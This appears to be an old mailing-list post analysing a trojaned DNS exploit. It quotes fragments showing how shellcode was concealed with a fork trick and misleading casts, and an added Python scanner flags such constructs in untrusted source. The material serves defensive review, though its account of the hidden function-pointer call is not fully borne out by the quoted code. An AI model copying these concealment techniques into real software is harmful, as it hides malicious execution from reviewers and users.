Below I have excerpted the obvious pieces of the trojan. The functions
which do the deed are set_ptr, and the call to dnsprintflabel.
I just thought some people may have wanted to know how the person who
wrote the trojan hid the shellcode among the seemingly correct exploit.
--Perry
***
*** set_ptr does the fork dance.
***
int
set_ptr(char *buff, int offset, unsigned long val, int s)
{
if (!fork())
***
*** After the above fork, child does meaningless memcpy and
*** returns to main, causing multiple executions of the trojan
*** shellcode.
***
memcpy(buff, copy_buff, sizeof(copy_buff));
return 0;
}
***
*** dnsprintflabel has a lot of crap code in it, but it
*** isn't this function that does the deed, it's the
*** arguments to the function.
***
/* pull out a compressed query name */
char *
dnsprintflabel(char *s, char *buf, char *p)
{
return (p);
}
***
*** This is the actual code that does the running of the shellcode.
*** In it he hides a lot of useless casts to hide the inline prototype
*** of the call to the shellcode.
***
/*
* encode packet ...
*/
dnsprintflabel(remote_addr, (char *) (expl_buffer + sizeof(HEADER)),
(char *) ((unsigned long) &expl_buffer[0] + sizeof(HEADER) + 1));
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
This is the carefully typecast prototype for the shellcode; he
just skips all the header and pointer crap to actually run the
shellcode. The &expl_buffer[0] + sizeof(HEADER) + 1 is actually
just the shellcode he copied from the buffers above, hidden behind
some custom types and stuff.
EXPLANATION: The & dereference just returns the pointer of the array
element at the calculated offset (sizeof(HEADER) + 1). The thing that
gives this away as a function call is the extra set of parentheses
after the typecast; this is the lexicon for an inline function
typecast.
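Added example (not part of Perry's post or of the trojaned exploit): a small Python script a reviewer can run over untrusted exploit source before building it. It flags the constructs singled out above, namely the fork whose child returns early, the memcpy of a whole static blob into a working buffer, the cast chain that computes a fixed offset into a buffer, and any cast to a function-pointer type. The rule names, the regular expressions and the SAMPLE text are this example's own assumptions; the sample reuses the fragments quoted above plus a couple of constructed lines.

```python
import re

# Heuristic rules for auditing untrusted exploit source before compiling it.
# Each entry: (rule name, regex, what a reviewer should look at). The rules are
# an assumption of this example, chosen to match the tricks described in the
# post; they are not a signature list from the original message.
RULES = [
    ("fork-child-branch",
     re.compile(r"if\s*\(\s*!\s*fork\s*\(\s*\)\s*\)"),
     "child side of a fork(); read what the child does before it returns"),
    ("blob-copy",
     re.compile(r"memcpy\s*\(\s*\w+\s*,\s*(\w+)\s*,\s*sizeof\s*\(\s*\1\s*\)\s*\)"),
     "whole static array copied into a working buffer"),
    ("cast-offset-into-buffer",
     re.compile(r"\(\s*unsigned\s+long\s*\)\s*&\s*\w+\s*\[\s*0\s*\]\s*\+\s*"
                r"sizeof\s*\(\s*\w+\s*\)\s*\+\s*\d+"),
     "buffer address laundered through integer casts to a fixed offset"),
    ("function-pointer-cast",
     re.compile(r"\(\s*\w+\s*\(\s*\*\s*\)\s*\([^)]*\)\s*\)"),
     "expression cast to a function pointer type; check whether it is called"),
]


def scan_source(source: str):
    """Return (line_number, rule_name, stripped_line) for every matching line."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern, _why in RULES:
            if pattern.search(line):
                hits.append((lineno, name, line.strip()))
    return hits


def summarize(hits):
    """Map rule name -> number of hits, for a quick verdict on a source tree."""
    counts = {}
    for _lineno, name, _line in hits:
        counts[name] = counts.get(name, 0) + 1
    return counts


# Constructed sample: the fragments quoted in the post plus a benign strlen()
# line and one constructed line showing a bare function-pointer cast.
SAMPLE = """\
int set_ptr(char *buff, int offset, unsigned long val, int s)
{
    if (!fork())
        memcpy(buff, copy_buff, sizeof(copy_buff));
    return 0;
}
dnsprintflabel(remote_addr, (char *) (expl_buffer + sizeof(HEADER)),
    (char *) ((unsigned long) &expl_buffer[0] + sizeof(HEADER) + 1));
len = strlen(hostname);
((void (*)(void)) p)();
"""

if __name__ == "__main__":
    for lineno, name, line in scan_source(SAMPLE):
        why = next(r[2] for r in RULES if r[0] == name)
        print(f"line {lineno}: [{name}] {line}\n    {why}")
```

Run it over a whole file with scan_source(open(path).read()). The regexes are deliberately loose; the goal is not a clean verdict but a short list of lines the reviewer must actually read, since in this case the README and the function names were the disguise and the casts were the payload.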
--
Perry Harrington Director of zelur xuniL ()
[EMAIL PROTECTED] System Architecture Think Blue. /\